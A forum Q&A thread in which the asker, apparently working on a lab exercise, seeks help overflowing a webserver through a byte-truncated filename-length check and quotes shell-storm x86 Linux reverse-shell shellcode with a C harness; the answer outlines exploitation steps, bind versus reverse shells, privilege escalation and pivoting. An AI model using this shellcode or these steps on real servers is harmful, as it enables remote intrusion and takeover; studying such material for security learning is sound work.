0

I have a webserver.c file and I already know what the bug is. It lies in this section:

    int check_filename_length(byte len) {
      if (len < 100)
        return 1;
      return 0;
    }

It converts the length of the file that is being sent to the webserver into a byte, so things that are greater than 100 bytes can still be sent it as long as the last 8 bits are correctly specified.

I'm trying to create a file that will buffer overflow the webserver, which is hosted on a Ubuntu 32-bit machine with Intel architecture. I've been trying to get some tips on how to:

  1. Figure out the return address to overwrite.
  2. Write out shellcode that will open up a port and a shell that is bound to a port on my local machine.
  3. Execute instructions on the remote webserver's shell to modify files.

Here is some sample shellcode (http://shell-storm.org/shellcode/files/shellcode-98.php) from shell_storm that I have been looking at but I'm not sure how I would perform the above tasks in question.

    char code[] = "\x31\xc0\x50\x50\xb0\x17\x50\xcd\x80"
           "\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd"
           "\x80\x89\xc2\x68\x7f\x00\x00\x01\x68"
           "\x00\x02\x1f\x40\x89\xe0\x6a\x10\x50"
           "\x52\x31\xc0\xb0\x62\x50\xcd\x80\xb1"
           "\x03\x31\xdb\x53\x52\xb0\x5a\x50\xcd"
           "\x80\x43\xe2\xf6\x31\xc0\x50\x68\x6e"
           "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
           "\xe3\x53\x50\x54\x53\xb0\x3b\x50\xcd"
           "\x80\x31\xc0\x50\x50\xcd\x80";

    int main(int argc, char **argv) {

          /* used to get ip:port combo for pushes */
            char *ip_addr = "127.0.0.1"; // watch for addresses that create \x00 and others
            int port = 8000;
            struct sockaddr_in dest;

            printf("IP: %s\n", ip_addr);
            printf("PORT: %d\n", port);

            dest.sin_family = AF_INET;
            dest.sin_port=htons(port);
            dest.sin_addr.s_addr = inet_addr(ip_addr);

            printf("push 0x%x\t; host\n", dest.sin_addr.s_addr);
            printf("push 0x%x02AA\t; port\n", dest.sin_port);

            int (*func)();
            printf("Bytes: %d\n", sizeof(code));
            func = (int (*)()) code;
            (int)(*func)();
    }

    */

I'm not sure I completely understand this example above either, so any tips would be greatly greatly appreciated!

Improve this question
1

1 Answer 1

Reset to default
0

General Steps

  1. First your server has to be running and your server request should be executed by the vulnerable code
  2. Your payload has 2 major parts: The "custom exploit code" and the code to be executed once control has been obtained (e.g. reverse shell, bind shell).
  3. Once the payload has been processed, if you're using a bind shell exploit, a port will be opened in the same server where you can bind your shell / meterpreter etc. If you're using a reverse shell instead, the server will connect to a "specific computer" with a hard coded address.
  4. Once you have shell access, you can do whatever you like (e.g. delete files, escalate privileges, pivot) depending on your user level

Of course, you need to compile your C source code and generate the payload. If you're attack is remote, you have to send a request to the server with the payload. Otherwise, you need to have access to the server first (user privileges / not root) then try to escalate privileges to root with your program by passing some exploit parameters to the vulnerable process.

Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.